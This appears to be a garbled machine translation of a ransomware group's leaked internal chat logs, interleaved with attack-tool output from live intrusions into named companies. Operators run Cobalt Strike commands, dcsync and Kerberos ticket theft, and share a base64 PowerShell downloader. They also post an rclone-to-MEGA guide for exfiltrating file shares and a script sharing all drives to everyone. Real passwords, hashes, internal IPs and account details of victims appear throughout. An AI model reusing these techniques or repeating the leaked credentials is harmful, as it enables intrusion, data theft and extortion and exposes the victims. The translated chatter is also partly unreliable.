AM 42,606,592 redcloak.msi 10/26/2017 01:43 PM sysprep 01/29/2019 04:13 PM Users 11/22/2020 08:30 PM Windows 10/26/2018 09:41 AM Zabbix_Agent 3 File(s) 50,600,120 bytes 8 Dir(s) 82,381,557,760 bytes free ``at the root of....`` 12/08/2020 05:01 PM 204,192 pl64.dll ``dll remained+either raised or not attracted. 
let me ask stalin - his server was ``SHAREP-WEB1: 10.0.61.53 Volume in drive \10.0.61.53\c$ has no label. Volume Serial Number is F476-EA6A Directory of \10.0.61.53\c$ 02/09/2015 11:34 AM inetpub 08/22/2013 08:52 AM PerfLogs 12/08/2020 05:01 PM 204,192 pl64.dll 03/29/2019 05:54 PM Program Files 10/08/2019 10:19 AM Program Files (x86) 02/11/2015 09:59 AM root 02/05/2015 09:42 AM sysprep 05/24/2017 01:29 PM Users 07/26/2020 07:12 PM Windows 1 File(s) 204,192 bytes 8 Dir(s) 68,786,823,168 bytes free `` ok there's nothing on these servers at all, no ball or disk from all serversdid you get them all? and take them off in general \host\c$ I'll check this dir \\\host\c$\readme.txt >> report.txt returned files 10.0.53.58 "" 10.0.51.45 "" 10.0.254.22 "" 10.0.53.57 "" 10.0.53.54 "" 10.0.61.54 "" 10.0.53.53 "" 10.0.53.56 "" 10.0.61.86 ``` there's no balloon here? and it's being reportered on the 174 servers nowgm, right now) run it under the admin and change the host in a loop or something like thatmake a batkin with a loop in it dir \\host\\c$/readme.txt >> report.txt If you manually go through 200 servers, you'll get boredFINIIS1 - pings on nothing opensMANITOU - note thereADMINDC5 - note thereADM-RADIUS1 - note thereESPAPP3 - does not respond `` `` The request will be processed at a domain controller for domain main.crispregional.org. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator Allscripts_Admin allscripts_services AllscriptsSQL amhs-admin ashleys blove dragon helpdesk htservice jwashburn1 MBAM-RW-SVC meditech meditech-admin mhiers nodom pbodrey rlagrone rthomas smaxwell spf_svcs tcoppedge The command completed successfully. 
[+] received output: The request will be processed at a domain controller for domain main.crispregional.org. Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- Administrator rthomas The command completed successfully. [+] received output: The request will be processed at a domain controller for domain main.crispregional.org. Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator braccosupport Domain Admins meditech meditech-admin The command completed successfully. beacon> shell net localgroup "administrators" [*] Tasked beacon to run: net localgroup "administrators" [+] host called home, sent: 62 bytes [+] received output: Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- admin Administrator MAIN\Domain Admins The command completed successfully. ``Then throw the actual information in the confab, so that everything was in front of my eyes, no, not yet? Yes, I'm still doping armas. So we'll start soon. 
So what.octamovemovement wentprinjoin @user8 still, still quietly put `` IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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 ``full'' powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0ANgAwADgAaQBzADEAVABLAEUANgA5AHIAegBDAEgAdQB4AEQAOABBAFAAbABXAEUAUQBWAG0ATABJAHEAbwBmAFYASwBkAG8AMQBhADcAawAnACkAKQA7AA== Give me a load of the stuff you don't have...put the dlluwas supposed to be there yet. did it come? ok if it doesn't come in 30 min, you'll write 30 min. put@user4 give me more silk code add me to the confutaq still 1 help @user8 he has a fat network there would not want to lose it, build a dll from kobyzhivoy there) my it?TomHolzerFordwhat's his? ask my guys if it's theirs. I'll tell you what's mine... I'm confused, yours is not)((I mean @user4) urlbig.com:443vrue, found yours now give others do not exist think about how you'll act just run your eyes over the Mapuhoto not worthwhile@user9 write out a plan to close by roadmap7 under whom? which did not have time? if so, then the conf is not me yesterday there was another - ballymoregroup.com if you can get it back, I can continue with it, or user8 help with 26 trustsconf under it there was another one, but it almost immediately offsolved - did not have time heremb I will now launch you there in general those with whom I workedwill see what to give me)no. but for today, yes)are you done with him? no. 
we were here with the router again poking around and you started at 6? writing, yesterday the last one at the end of the day went to the offethese means to sit idle?there is no active guys, I'm not a telepath, if you sit without work write write that people are working in the input sessions who like yesterday are still dead why sit silently I also do not have a live in the input cobb is there new? or after 3 am or until 6 pm you know the timing in my grid kst only 8 am @user9 if finished take another network to work) ah) I will throw there and build before closing) so ah close.we are not closing now why? @tl1 add us to @user9 in the confab, if it's not difficultselfspin.com sorting of servers and other information in the confab.hiB corbel.com all ready for closure then the plan for today is: 2 people who have already taken YES work in the same networks and preparing to close, the rest while lifting the rightsDa, but not all came up All alive, in sound mind and health?HiTo all helloDa)morninG) to all goodnightTo all without misunderstandingTomorrow i.e. todayHappyTo all until tomorrow)hopefully in the eveningTo 6 khoroshoda, two?without "probably a normal grid" right? total 2 networks with Dada, also Dada and dll running `MM-LIB` host where the dll stuck rolling check and then staskun at the stage of work with vpnom it was in lrhstuck and did not solve how did you solve?give the hostname also yes and dll is running? 
well i had at least so it was somysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysm's was there yes, looking for edtam xp) ohohohojitwinds you ten tomorrow will solve these cases get such `` beacon> shell net use \\FAMIXXP\c$ rbuilder /user:Wilsonart.com\REPORT_BUILDER [*] Tasked beacon to run: net use \\FAMIXXP\c$ rbuilder /user:Wilsonart.com\REPORT_BUILDER [+] host called home, sent: 95 bytes [+] received output: System error 384 has occurred. You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack. Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747 ``boys are part of a group of hp adminstrusts will scour tomorrow in the current one or trastaherstech.com, fishusa.com, holzerford.com - removed adinfo, kerbs, EA YES. all sessions are off.this is wherealloypolymers.com >description: password rbuilder >description: Generic GroupWise account for Adhesives. Password - pword >description: Password is pword. >description: Pword-flas21a. Deco 1 >description: The password is waglobal2014 Password does not expire >description: For Trackit SQL passqord is trackit114 >description: The service account for DCWAS08 Execel Password is VantgagePoint ``@user8 here's some food for thought for tomorrow if the session doesn't die COGNOSPD.korbel.com dcsync was taken off, maybe the lab, now in slip, waiting for commands `wilsonart.com'. 
28 trusts, minus duplicates and quarantines - 7 7 trusts removed from hell, two trusts and the current domain removed from the kerbs @user9 say his hostname corbel.com There is a YES run the dll on the far server found sphere and creeds found edr and kredi Snatched the AD, lifted the system, no kredi to move on, with nyah kerb kredi given for decryption. are there dll running on the servers and so yes to me exactly the network interests with YES which we will close tomorrow write reports on work Many of 2826 trusts) are you many left? +++ alive? you about the zealot do not forget? my keyloggers empty (there is nothing empty) they just work with shul and sometimes write to each other keyloggers have not checked? yes shul there all in #waterway-com uploading backups mail finance admins + deal with shul so what do you have? so the sooner we check everything for tomorrow the sooner we go to bed today we're closing 2 grids so the sooner we work the sooner you go home today today today today today today today by 6 and today we need to prepare everything for tomorrow i understand you're tired today today we're closing the rt or till 00 work @tl2 @tl1 same, backups in water what are you busy doing? i did not try it, that's why i wrote it like with rdp)) try it without rdp? it pours very fast because of the high compression now there is no need for any 7za and unzipping the mega! everything is very quiet and unnoticeable! download rclon from the off-site. rclon.exe put it in the right directory, then everything according to the manual. I did everything through the rdp You register a mega, choose it from a huge list, which rclon provides us. rclon quietly connects to the mega and makes a clone of what you need. you can at least the whole fs. it downloads everything through rclon, so the download speed is high. Here's the guide.
It's simple https://rclone.org/mega/ next command to download rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 remote:NT - change only this. "remote" is the name of your mega. "NT" is your directory in the mega where it will be downloaded to, if it doesn't exist, it will create it itself. example rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 ``https://rclone.org/ if requires some amount of data to be uploaded''. 8. Backup database sqlcmd -S localhost -E -Q "BACKUP DATABASE name TO DISK='C:\PerfLogs\name.bak'" for remote/other local server change localhost to ip,port alternatively localhost,%port% (see netstat) 7. Output all tables of a specific database sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W with size in megabytes sqlcmd -S localhost -E -Q "SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;" 1. Display all databases on the server in kmd sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;" As soon as you jump into the process you look at the databases list by default there is sqlcmd tool installed on the server it has direct access to the data to backup the sqlwriter, sqlsrv processes on the sql server) worked I press the bind nothing happens what? @tl1 Doesn't work & https://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/tools/1vpn check thereupon there is access to the domain no load for him Hi Hi, our evo vpn has fallen off Hi Hi Hi Well, now checking did you check wilson? did the file appear on the unshared armas? flew home where we have @user9?
how unexpected and nice aaa we miss our family as much as you) missed you?) hello To all hello Do you want me to ask everyone in the confu skinu to the appropriate confu aga, I'll dig in the records of strangers to see what there may be interesting them the difficulty, as I understand from @user7 is to find a sphere / backups? well, let's finish today probably? there he is small aha) as you see - norrivet good evening! @tl1 not yet? ``Good evening. we're here))))) Thank you for such flattering words, and @tl1 is also a pleasure to work with I wish I could find some red words, but I'll just respond with... an anecdote! A pentester is walking through the desert, he wants sex, he meets a genie, and he asks him "What do you want, traveler?" -Fucking, says the pentester. And then out of nowhere appears a bunch of all sorts of spheres without creed, not decrypted hashes on kmd5, nets in which the domain is not visible and a billion all kinds of avers -Get the fuck out of here," jinny answers. -Yes, the last thing I wanted to say, while you're resting, think about whether any of you want to take additional offline courses through the official pentester refresher course. CEH, OSCP and the like So have a nice holidays) see you next year) Likewise) We are also happy to work with you ) From us too we want to say thank you, it is a very useful experience, especially in a short period of time.
My head is boiling, but it is interesting) Happy New Year to you = ) ) In short - all are good) the most difficult passed) further will only be more interesting) from my experience, I say that in comparison, you are growing very fast on the technical part, small zatupy have all, and this is normal But next year we'll get to a completely different speed, start parallel technologies, dig nixes i for my part and @tl1 and the development team will also be preparing some cool stuff for you hope i am not mistaken) and for a very short time by the standards of junior pentests we have come a long way from 0 to the current cases with the flag -nomutex so i want to share my impressions then see you soon) backups in work, the backups are working and i'll be back up by 21 til next tuesday. i will be back up by 21 tuesday but report here now please = ) so @tl1 knows what's the plan) who can today - pull up to 21 if no one can, go on vacation I don't know anything.) At @tl1 let's ask) last day also in case of success? >last case on the last day vono, of course, no problem, if anyone else can not - say, today "at will" with bonuses in case of success of the work itself vtl1 we'll have a day of groundhogs at me at all I just looked at the calendar for the first time in a week and a half or two I will be able to communicate, but not in the office, in the evening I fly away I was planning to go on holiday today, so the tickets are bought( i think the guys will cope with a small network without me a good question, i think to finish some last case on the last day =) and for what, like we said on holidays go away ... friends, today's case comes to an end, as the final touches to backup will be solved, the server and workstation checked - all go to rest @tl1 said before leaving that we're going to 21, have time to rest? Well, another plus exeshnik is a lot of threads.
icacls a long team dobavliv grunt full po therefore exeshnik seemed easier) there batnick also swore - and Timlid2 said, I threw you in private, something about regulars, etc. so polis are more swearing ehena exe and scatter batnik easier than ehe sut same in order to scatter on armies why not batnick? and build me, in laba running asdavayne, if grunt full works fine then add it to the exeshnik - minute and so and so ran from the admin? i checked in the laba batnick - no problem with this no - vorkgrup tachka outside the domain? Node Name: DESKTOP-5SMSDNR OS Name: Microsoft Windows 10 Pro OS Version: 10.0.18363 N/A OS Manufacturer: Microsoft Corporation OS Settings: Isolated Workstation OS Build: Multiprocessor Free Registered Owner: User Registered Organization: Product Code: 00330-80000-00000-AA618 Installation Date: 09/16/2020, 13:38:44 System Boot Time: 12/22/2020, 1:54:35 System Manufacturer: Gigabyte Technology Co. System model: G31M-ES2L System type: x64-based PC Processor(s): Number of processors - 1. [01]: Intel64 Family 6 Model 23 Stepping 10 GenuineIntel ~2834 MHz BIOS version: Award Software International, Inc. FF, 10/13/2009 Windows folder: C:\Windows System folder: C:\Windows\system32 Boot device: \Device\HarddiskVolume1 System language: ru;Russian Input language: ru;Russian Time zone: (UTC+03:00) Moscow, St. Petersburg Full physical memory: 4,085 MB Available physical memory: 715 MB Virtual memory: Max size: 5,621 MB Virtual memory: Available: 828 MB Virtual memory: Used: 4,793 MB Swap file location: C:\pagefile.sys Domain: WORKGROUP Network login server: \DESKTOP-5SMSDNR Patch(s): Number of installed patches - 12. [01]: KB4586878 [02]: KB4513661 [03]: KB4516115 [04]: KB4517245 [05]: KB4521863 [06]: KB4561600 [07]: KB4576751 [08]: KB4576754 [09]: KB4577670 [10]: KB4580325 [11]: KB4586863 [12]: KB4592449 Network adapters: Number of network adapters - 2.
[01]: Qualcomm Atheros AR8131 PCI-E Gigabit Ethernet Controller (NDIS 6.30) Connection Name: Ethernet DHCP enabled: Yes DHCP server: 192.168.88.1 IP address [01]: 192.168.88.248 [02]: fe80::d935:55:e14f:fe49 [02]: VirtualBox Host-Only Ethernet Adapter Connection Name: VirtualBox Host-Only Network DHCP enabled: None IP address [01]: 192.168.56.1 [02]: fe80::f4c1:748b:225c:98a0 Hyper-V Requirements: Virtual machine monitoring mode extensions: Yes Virtualization enabled in firmware: Yes Layer 2 address conversion: No Data execution prevention available: Yes ``vin10version os etc.'' Where do you run it? System error 1332. Matching between user names and security identifiers has not been performed. ``there - where?'' without grunt full, it's just going the wrong way. C:\Users\awilson\Desktop>1.bat C:\Users\awilson\Desktop>net share c=c: /grant:everyone,full c was shared successfully. C:\Users\awilson\Desktop>net share d=d: /grant:everyone,full d was shared successfully. C:\Users\awilson\Desktop>net share e=e: /grant:everyone,full The device or directory does not exist. More help is available by typing NET HELPMSG 2116. C:\Users\awilson\Desktop>net share f=f: /grant:everyone,full The device or directory does not exist. More help is available by typing NET HELPMSG 2116. C:\Users\awilson\Desktop>net share g=g: /grant:everyone,full The device or directory does not exist. More help is available by typing NET HELPMSG 2116. NET share A=A: / grant:everyone,full`` you have a space there so lol)`` the same principle read a file that doesn`t exist so what do you want? C:\Users\shara\source\repos\SharpHandler\bin\Debug\netcoreapp3.1>net share A=A: / grant:everyone,full Unknown parameter /. 
Syntax for this command: NET SHARE shared_resource shared_resource=disk:path [/GRANT:user,[READ | CHANGE | FULL]] [/USERS:number | /UNLIMITED] [/REMARK: "text"] [/CACHE:Manual | Documents| Programs | BranchCache | None] shared_resource [/USERS:number | /UNLIMITED] [/REMARK: "text"] [/CACHE:Manual | Documents | Programs | BranchCache | None] {shared_resource | device_name | drive:path} /DELETE shared_resource \\computer_name /DELETE For more help, type NET HELPMSG 3506. C:\Users\shara\source\repos\SharpHandler\bin\Debug\netcoreapp3.1>net share A=A: /grant:everyone,full System error 1332. The mapping between user names and security identifiers has not been done. I ran the lead on our office computer. win10 what was the environment? So it was in the batch file and it was telling me "I can't match something to something" I don't know what it was telling me? /grant:everyone,full ``` it's not working at all ``` /grant Everyone:F /T /C /Q /grant:everyone,full ``` did you take this into account? didn't you make this one? not this one? what was the batik and the exechanger? I won't answer, you'll get scolded, did you make the batik and then the exechanger by any chance save it? good question, I do not know which of the confines of the wrote it guys who remember where @tl2 wrote about the driver balls, please copy them to health host specified in , the second argument) mapped only c$ balls thank you) `` `` Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 04:06:28> share-mapper KCNEWBACKUP2020 [*] Attaching c$ in KCNEWBACKUP2020 host [*] Tasked beacon to run: net use *\\\KCNEWBACKUP2020\c$ /PERSISTENT:YES [*] Tasked beacon to run: net use [+] host called home, sent: 115 bytes [+] received output: Drive Z: is now connected to \\KCNEWBACKUP2020\c$. The command completed successfully. [+] received output: New connections will be remembered.
Status Local Remote Network ------------------------------------------------------------------------------- OK Z: \KCNEWBACKUP2020\c$ Microsoft Windows Network The command completed successfully. Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 04:06:51> shell net use [*] Tasked beacon to run: net use [+] host called home, sent: 38 bytes [+] received output: New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------- OK Z: \KCNEWBACKUP2020\c$ Microsoft Windows Network The command completed successfully. ``Check''. #ShareMapper.cna #Author: @noname #no desc beacon_command_register("share-mapper", "shares attacher", "Syntax: share-mapper [hostname1,hostname2,hostname3,hostname4]"); alias share-mapper { if ($2 is $null) { berror($1, "Need hosts!"); } else { @hsts = split(",", ["$2" trim]); foreach $entry (@hsts) { blog2($1, "Attaching c\$ in $entry host"); bshell($1, "net use * \\\\$entry\\c\$ /PERSISTENT:YES"); } bshell($1, "net use"); } } ``For fuck's sake,`` already threw it here, not alive? if not - to reopen then @tl1 ok? $krb5tgs$23$*sqlman$epctech.com$MSSQLSvc/sqlsrv02.epctech.com ydkwicd ``Truthfully not yet tested myself) looks interesting, but what is the "poc.exe", is it an exploit or just a tool so that the file will not be deleted? not really understand it http://decoder.cloud/2020/10/24/when-ntuser-pol-leads-you-to-system/ but not in 2 we guessed) no new sessions today) mm-hmmm, then continue to work dahdal @tl2 ? and where do we have @user1 and @user3? it's ok)) and @tl2 just re-snap the accessible kerb) how to check it?
there are kerbs disconnected accounts yes you get the idea if the kerb LA on the server somewhere there may well be hash admin and so you can try to kerb that will unbroken check on the car from which was kerbda kerby just there? so what's the difference between admin/non-admin in this case, I'll look at the tickets They've deleted a lot of admins, and now the kerbs are only on the absent. no kerbs (kerbs only faster @tl2 now I'll change it so it will be better you at least change your ava) it's ok, keep quiet for a minute and he'll see for himself) look who wrote it, never mind the point it does not matter he read and did not understand it and what? well, read it carefully and what did you throw it at me first? Yeah 1 kerbs will be the same no matter what car they were shot on? Not me) re-shoot and direct to @tl2 Need to re-shoot Yes, the old ones went stale... there is an alternative solution for snpartners, there are yes - but the farm is not there yet (and we have no kerbs at all so the farm will be in 2 weeks anyway kerbs yes no kerbs are you kerbs filmed? we're trying to get the credits YES :dog: ? as it turns out nothing) (also a joke, don't take it seriously) you know? and today you said "by ten" and then "by two" you said "by ten", and? it's clear, you just said the same) i didn't understand what i wrote ? by two ? ? I have deja vu it's on the old but there will be new ones closer to 10 That just came in. Are the new ones coming? or can the chinese come back? while there are no new ones, what are the old ones doing now?
on #stanthonyskc-com too on #snpartners-com nothing new How are the tasks going? :space_invader: hello How is the progress on the others? the chinese are not back, no new ones... What time do we wrap it up at 6:00? What time tonight? Sessions is stuck. Thanks a lot and I've got it... if you use parameter --public-only then it will show only those where user admin by default 50 like the threads are turned up to max... but that's cool. why is it so monsterrickly fast? no it's not, it'll show the balls and take the list from the ad toot just sharers I think ad is only used with ips? execute-assembly SharpSharesNG.exe shares ad --alive --output file.txt ``` correct ? ops) ``execute-assembly SharpSharesNG.exe ips list servaki.txt --alive --output servaki-alive.txt `` ping the fostlist )`` * SharpSharesNG --max-threads 10 --output console|/path/to/file * * ips - equiv ips ad * ips 10.0.0.1 [--os-detect] [--alive] [--exec] script\path * ips 10.0.0.1/24 [--os-detect] [--alive] [--exec] script\path * ips HostName [--os-detect] [--alive] [--exec] script\path * ips [ad] [--os-detect] [--alive] [--exec] script\path * ips [list] c:\users\hostlist.txt [--os-detect] [--alive] [--exec] script\path * * * shares - equiv shares ad * shares 10.0.0.1 [--os-detect] [--public-only] * shares 10.0.0.1/24 [--os-detect] [--public-only] * shares HostName [--os-detect] [--public-only] * shares [ad] [--os-detect] [--public-only] * shares [list] c:\users\hostlist.txt [--os-detect] [--public-only] ``She's, secludes? or just start it and it spits somewhere? is there any argument? @all share please ѕharshareset one and a half pk @user8 with @user3 are preparing which of ? today we close one network however not, there already all in water how is it?
if not collects detailed report in confusobirthing nothin, tried three times - not collects work tules panel what, not working?hmchet all the same lostprobuyuje@tl1 reboot my dedikt plz)))) boshyuyaa all so we kolupali so a month in zohocorpinadaworkgroup? and vg is what? meanwhile study the methods of work through vpn in vg20 min then recurse you now without a task?what did you read in the mail? was it my versionoffline backups? understand how you recovered and what you missed? beacon> shell nltest /dclist:waterway.com [*] Tasked beacon to run: nltest /dclist:waterway.com [+] host called home, sent: 58 bytes [+] received output: Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN The command completed successfully ``` ``` beacon> shell nltest /dclist: [*] Tasked beacon to run: nltest /dclist: [+] host called home, sent: 46 bytes [+] received output: Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN The command completed successfully ``You threw the output with fqdn and that's what I threw the output from try to get the DC list from the list /dclist:shell nltets /dclist:yeah, fuck it``` Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN The command completed successfully ``just went to the cheknudomnoy authorization is there? hello2sessions in the water left? all bruhtoff zapatosessione not come to life, bullet? 
okzaytit went so, and what do you mean by ``works``? this works? yeah i mean we're gonna close today for sure, no matter what we found, no we didn't find it, we're gonna bust it so yeah, we tried it, if we don't find any nass codes, fuck it, so you're probably gonna bust it without me, 3 kobos per lock ``I'm going to throw the builds in there coba blocked again... in the main domain `OSDJIGHF&8SYIG*H shell dir \\10.7.6.127\C$ [*] Tasked beacon to run: dir \\10.7.6.127\C$ [+] host called home, sent: 50 bytes [+] received output: Volume in drive \10.7.6.127\C$ has no label. Volume Serial Number is D68F-16CB Directory of \10.7.6.127$ 05/09/2016 11:32 a. m. 1,024 .rnd 05/09/2016 11:57 a. m. 0 2016-09-05_ImportTool.log 30/04/2015 10:27 a. m. inetpub 22/08/2013 09:52 a. m. PerfLogs 10/02/2021 12:57 p. m. Program Files 23/11/2020 09:51 p. m. Program Files (x86) 09/02/2021 10:31 a. m. quarantine 16/10/2018 10:09 a. m. 17 SA.txt 29/04/2015 04:41 p. m. sysprep 08/05/2018 11:46 a. m. temp 10/02/2021 12:46 p. m. Users 10/02/2021 01:01 p. m. Windows 24/12/2020 04:35 a. m. 17 WINDOWS-OS-NoPetyaVac-Perfc.log 4 File(s) 1,058 bytes 9 Dir(s) 15,374,311,424 bytes free beacon> shell type \\10.7.6.127\C$\SA.txt [*] Tasked beacon to run: type \\\10.7.6.127\C$\SA.txt [+] host called home, sent: 58 bytes [+] received output: T3l3v1$a$f32018 ````CORPKIOBEY01.corp.televisa.com.mx User name ES050616C Full Name Servicio ES050616C Comment CORP - 4337626 - Alta 13/02/2019 - Responsable: Jose Juan Muniz Mendoza.
Responsable 2: Adrián Ruíz Mondragon User's comment Country/region code (null) Account active Locked Account expires Never Password last set 2/12/2021 1:08:33 AM Password expires 6/12/2021 1:08:33 AM Password changeable 2/13/2021 1:08:33 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 2/11/2021 2:05:13 PM Logon hours allowed All Local Group Memberships Global Group memberships *Servicio Basico *Domain Users *User_PSO *Domain Admins The command completed successfully. ``Well, then let's close today. You've speeded up two more trusts? Teemo[TVSAKIODC01]SYSTEM */14100|2021Feb12 22:01:17> dcsync televisa.com.mx [*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:televisa.com.mx /all /csv command [+] host called home, sent: 296050 bytes [+] received output: [DC] 'televisa.com.mx' will be the domain [DC] 'TVSAKIODC01.televisa.com.mx' will be the DC server [DC] Exporting domain 'televisa.com.mx' ``on the timing for AV ? according to software tests to @user3 there is a macaffi it's not a fact that it's him, look for AV and drop vindeftoot another thing they have a lot of traffic as soon as, on some domain Traffic there is blocked, apparently some software If we have an update on
the igekt - dll can be launched by hand Maybe we should first launch the dll from one session on the servers, then the armas Then through the shell dir\tasklist will check if everything is ok, premium on the phno he is in testing + like brought updated shellcode inge you will get an account from that you have long asked still update with you parsed algorithm + look admin nasa, backups and stuff 3 get into trusts 2 people re-serialize this domain ponyatot domain is a hashdump on dk kredov imports from cobi in clearing 1 like a domain CORP\jajimenezar Oxpp912341ek9$$! ``looks like a localhost domain CORPKIODC03 better to look at hypothetically adjacent servers ha also think you understand that the triage can show tickets from adjacent domains today think we'll close then work on the forum? with rubeus no you got us confused here mimikom all right we did it rubeus in general that crap you recorded on the tickets? all under the record you at least record... not with each other we fucked with each other what can you do and you fucked so much another thing))) https://medium.com/@t0pazg3m/pass-the-ticket-ptt-attack-in-mimikatz-and-a-gotcha-96a5805e257a`` [*] SamAccountName : SCMusr [*] DistinguishedName : CN=Servicio SCM Users,OU=Exclusiones 2016 Corp,DC=corp,DC=televisa,DC=com,DC=mx [*] ServicePrincipalName : MSSQLSvc/CORPSFEBDP115.corp.televisa.com.mx [*] PwdLastSet : 2/9/2021 12:12:24 AM [*] Supported ETypes : RC4_HMAC_DEFAULT [*] SamAccountName : operaproy [*] DistinguishedName : CN=Operador Proyectos,OU=Exclusiones 2016 Corp,DC=corp,DC=televisa,DC=com,DC=mx [*] ServicePrincipalName : http/corpkionscep01 [*] PwdLastSet : 2/11/2021 5:25:45 PM [*] Supported ETypes : RC4_HMAC_DEFAULT ``https://prog.world/we-analyze-attacks-on-kerberos-using-rubeus-part-2/ LOL the site is in english and the screens are russian))) https://habr.com/ru/company/tomhunter/blog/507140/ ``. C:\Rubeus>Rubeus.exe changepw /ticket:doIFFjCCBRKgA...(snip)...== /new:Password123! ``https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html if for today you will close then change it)`` that's how you can change their passwords ho UserName : iwam_gsccorp Domain : CORP LogonId : 0x5f97dbc1 UserSID : S-1-5-21-1935655697-1715567821-1801674531-500 AuthenticationPackage : Negotiate LogonType : NewCredentials LogonTime : 2/11/2021 5:06:01 PM LogonServer : LogonServerDNSDomain : CORP.TELEVISA.COM.MX UserPrincipalName : IWAM_GSCCORP@televisa.com.mx ServiceName : krbtgt/CORP.TELEVISA.COM.MX ServiceRealm : CORP.TELEVISA.COM.MX UserName : scvmmadmin UserRealm : CORP.TELEVISA.COM.MX StartTime : 2/12/2021 3:13:41 AM EndTime : 2/12/2021 1:13:41 PM RenewTill : 2/18/2021 5:28:41 PM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac ``or on third-party resources, see githabc with this now UserName : iwam_gsccorp Domain : CORP LogonId : 0xeccec UserSID : S-1-5-21-1935655697-1715567821-1801674531-500 AuthenticationPackage : Kerberos LogonType : RemoteInteractive LogonTime : 1/29/2021 7:45:21 PM LogonServer : CORPKIODC04 LogonServerDNSDomain : CORP.TELEVISA.COM.MX UserPrincipalName : IWAM_GSCCORP@televisa.com.mx ServiceName : krbtgt/CORP.TELEVISA.COM.MX ServiceRealm : CORP.TELEVISA.COM.MX UserName : IWAM_GSCCORP UserRealm : CORP.TELEVISA.COM.MX StartTime : 2/12/2021 6:50:28 AM EndTime : 2/12/2021 4:50:28 PM RenewTill : 2/12/2021 7:43:12 PM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : aes256_cts_hmac_sha1 ``Works Check the koba again`` after you click on endpoint nothing happens what is the error?
```
forkcar.com 192.111.151.198:22220 Ms4g6n8CfMfQGukSAeM8EEu7VzWCLL7ArdH
\TVSADMIN 616d703b0c6c52f0db8ff43611ab4031
```

so you used a token

```
Teemo1[CORPAZUUPM]SYSTEM */484|2021Feb12 18:45:09> steal_token 4512
[*] Tasked beacon to steal the steal_token from PID 4512
[+] host called home, sent: 24 bytes
[+] Impersonated CORP\T1812

Teemo1[CORPAZUUPM]SYSTEM */484|2021Feb12 18:45:48> shell dir \\10.7.0.55\C$
[*] Tasked beacon to run: dir \\10.7.0.55\C$
[+] host called home, sent: 61 bytes
[+] received output:
The user name or password is incorrect.
```

well I tried ((

```
The request will be processed at a domain controller for domain corp.televisa.com.mx.

User name                    t1812
Full Name                    Servicio T1812
Comment                      Santa Fe Rep:4336636 Res1:JAVIER CRUZ BARRANCO Res2:ADRIAN RUIZ MONDRAGON (Alta) 08/01/2019 // Se agrego al grupo Domain Admins a peticion de Hugo Martinez Rocha por Correo electronico.
User's comment
Country/region code          (null)
Account active               Yes
Account expires              Never

Password last set            2/12/2021 1:18:50 AM
Password expires             6/12/2021 1:18:50 AM
Password changeable          2/13/2021 1:18:50 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2/11/2021 9:31:41 AM

Logon hours allowed          All

Local Group Memberships      *Account Operators    *Server Operators
Global Group memberships     *Servicio Basico      *Domain Users
                             *User_PSO             *Domain Admins
                             *Protected Users
```

```
Teemo1[CORPAZUUPM]SYSTEM */484|2021Feb12 06:04:10> shell dir \\10.30.64.10\C$\Users
[*] Tasked beacon to run: dir \\10.30.64.10\C$\Users
[+] host called home, sent: 69 bytes
[+] received output:
 Volume in drive \\10.30.64.10\C$ is Windows
 Volume Serial Number is 56D1-9C35

 Directory of \\10.30.64.10\C$\Users

02/11/2021  03:46 PM    .
02/11/2021  03:46 PM    ..
11/21/2016  02:17 AM    public
05/22/2020  01:34 PM    SOPORTE-CITRIX
02/11/2021  03:46 PM    T1812
04/09/2020  09:36 PM    TVSADMIN
               0 File(s)              0 bytes
               6 Dir(s)  113,737,977,856 bytes free
```

this car should try to yank tickets tomorrow by 6na today all and watch interesting tickets check all servers

what are you rich?

```
    ServiceName          : krbtgt/CORP.TELEVISA.COM.MX
    ServiceRealm         : CORP.TELEVISA.COM.MX
    UserName             : CORPKLHLQRD01$
    UserRealm            : CORP.TELEVISA.COM.MX
    StartTime            : 2/11/2021 7:38:29 PM
    EndTime              : 2/12/2021 5:38:29 AM
    RenewTill            : 2/18/2021 7:38:29 PM
